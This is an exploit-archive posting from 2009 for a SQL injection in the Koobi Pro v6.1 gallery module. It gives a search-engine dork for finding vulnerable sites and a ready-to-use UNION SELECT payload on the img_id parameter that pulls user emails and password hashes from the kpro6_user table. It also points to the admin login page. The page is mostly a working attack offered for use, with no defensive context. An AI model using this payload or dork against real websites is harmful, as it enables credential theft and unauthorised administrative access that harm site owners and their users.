[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Koobi Pro v6.1 gallery (img_id)
# Published : 2009-12-27
# Author : BILGE_KAGAN
# Previous Title : Mambo Component Material Suche 1.0 SQL injection Vulnerability
# Next Title : paFileDB 3.1 Cross Site Scripting Vulnerability


##########################################
#
# Koobi Pro v6.1 gallery (img_id)
#

##########################################
#
##AUTHOR : BILGE_KAGAN
#
####HOME : http://www.1923turk.biz
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+kpro6_user


aDM�N PANEL�:

admin/login.php